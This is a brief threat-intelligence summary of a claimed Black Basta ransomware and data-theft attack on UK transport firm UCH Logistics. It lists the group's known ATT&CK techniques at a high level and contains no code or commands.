UCH Logistics Ransomware Attack by Black Basta

Overview

UCH Logistics, a leading provider of transport services in the UK, recently experienced a ransomware attack by the Black Basta group. This attack involved the exfiltration of approximately 895 GB of sensitive data, including employee files and personal documents.

The Black Basta Ransomware Group

  • Active Since April 2022: Black Basta, known for its ransomware-as-a-service operations, has been targeting high-value organizations globally since its emergence in April 2022.
  • Double Extortion Technique: Employing a double extortion approach, the group threatens to release stolen data on dark web leak sites if ransom demands are not met.
  • Ransomware Characteristics: The ransomware, targeting both Windows and Linux systems, employs sophisticated encryption algorithms to lock victims’ data.

Attack Methodology

  • Data Exfiltration: Black Basta claims possession of 895 GB of UCH Logistics’ sensitive data, with a sample leaked as proof.
  • Ransom Demand: A ransom demand with a deadline, though the exact amount remains undisclosed, has been set.
  • Lack of Official Response: UCH Logistics has yet to respond officially to the incident.

Tactics, Techniques, and Procedures (TTPs)

Black Basta affiliates leverage several TTPs:

  • Initial Access (T1566.001): Spear phishing emails with malicious zip files.
  • Execution (T1569.002, T1047, T1059.001): Utilizing system services, Windows Management Instrumentation, and PowerShell for payload execution.
  • Persistence (T1136, T1098, T1543.003): Creating accounts and modifying system processes.
  • Privilege Escalation and Defense Evasion (T1484.001, T1218.010): Modifying group policies and using system binary proxy execution.
  • Credential Access (T1555): Using tools like Mimikatz for credential dumping.
  • Lateral Movement (T1021.001): Using Remote Desktop Protocol.
  • Impact (T1486, T1489, T1490): Encrypting data and inhibiting system recovery.

Further Context and Insights